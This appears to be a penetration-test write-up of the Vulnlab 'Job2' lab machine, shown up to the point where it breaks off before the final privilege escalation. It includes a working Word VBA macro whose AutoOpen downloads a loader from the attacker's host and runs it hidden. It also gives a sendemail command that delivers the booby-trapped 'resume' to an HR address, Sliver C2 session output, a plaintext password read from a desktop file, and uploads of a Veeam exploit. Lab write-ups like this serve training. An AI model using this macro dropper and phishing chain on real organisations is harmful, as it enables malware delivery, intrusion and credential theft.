22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
1063/tcp open rpcbind syn-ack ttl 127
2049/tcp open rpcbind syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Service enumeration
SMTP
The service is vulnerable to Open Relay, which means any unauthenticated user can send emails through it
❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
HTTPS (www.job2.vl)
Possible Attack Path: If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!
Initial Access
During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.
Setting up Macro for MS Word
It was discovered AV Engine running into the system blocking everything. The tester proceeded to use Bypass AV/EDR via DInvoke + Sliver to bypass and obtain a reverse shell.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
ByVal lpCmdLine As String, _
ByVal uCmdShow As Long) As Long
Sub AutoOpen()
URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub
Sending the malicious file via sendemail tool
❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully! From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]
Lateral movement to Ferdinand
Performing Situational Awarness
sliver (http-vulnlabs-4444) > sa-whoami
[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:
UserName SID
====================== ====================================
JOB2\Julian S-1-5-21-3935782767-3829597994-1046841959-1000
GROUP INFORMATION Type SID Attributes
================================================= ===================== ============================================= ==================================================
JOB2\None Group S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group,
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,
Privilege Name Description State
============================= ================================================= ===========================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (http-vulnlabs-4444) >
sliver (http-vulnlabs-4444) > ls
C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx AWS SDK for .NET <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx AWS Tools <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx Common Files <dir> Wed May 03 18:47:14 +0000 2023
-rw-rw-rw- desktop.ini 174 B Sat May 08 08:18:31 +0000 2021
drwxrwxrwx hMailServer <dir> Wed May 03 13:48:57 +0000 2023
drwxrwxrwx Internet Explorer <dir> Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx LINQPad5 <dir> Wed May 03 14:05:02 +0000 2023
drwxrwxrwx Microsoft <dir> Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx Microsoft Office <dir> Wed May 03 15:15:38 +0000 2023
drwxrwxrwx Microsoft OneDrive <dir> Tue May 02 21:20:00 +0000 2023
drwxrwxrwx Microsoft SQL Server <dir> Wed May 03 18:15:45 +0000 2023
drwxrwxrwx Microsoft SQL Server Compact Edition <dir> Wed May 03 14:08:26 +0000 2023
drwxrwxrwx Microsoft Synchronization Services <dir> Wed May 03 13:49:01 +0000 2023
drwxrwxrwx Microsoft Visual Studio 14.0 <dir> Wed May 03 18:11:58 +0000 2023
drwxrwxrwx Microsoft.NET <dir> Wed May 03 18:15:54 +0000 2023
drwxrwxrwx MSBuild <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Reference Assemblies <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Veeam <dir> Wed May 03 18:47:42 +0000 2023
drwxrwxrwx Windows Defender <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Mail <dir> Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx Windows Media Player <dir> Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx Windows NT <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Photo Viewer <dir> Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx Windows Sidebar <dir> Sat May 08 08:34:49 +0000 2021
drwxrwxrwx WindowsPowerShell <dir> Sat May 08 08:34:49 +0000 2021
sliver (http-vulnlabs-4444) >
LINQPad 5 is a powerful software utility specifically designed for .NET Framework 4.6 development, allowing developers to interactively query SQL databases and write C# code without needing a full IDE.
hMailServer is a free, open source, e-mail server for Microsoft Windows. It's used by Internet service providers, companies, governments, schools and enthusiasts in all parts of the world.
Veeam is a software company specializing in data protection, backup, and disaster recovery solutions for various workloads, including virtual, physical, cloud-based, and SaaS environments
Discovering a credentials in Julian's Desktop
sliver (http-vulnlabs-4444) > ls
C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r-- creds.txt 39 B Wed May 03 15:38:10 +0000 2023
-rw-rw-rw- desktop.ini 282 B Wed May 03 16:28:26 +0000 2023
-rw-rw-rw- Word 2016.lnk 2.5 KiB Thu May 04 10:43:29 +0000 2023
sliver (http-vulnlabs-4444) > cat creds.txt
Mailserver Administrator: MailAdm1n2023
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe
[*] Wrote file to C:\Temp\VeeamHax.exe
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Common.dll
Exploit vulnerability to obtain a shell as NT Authority System
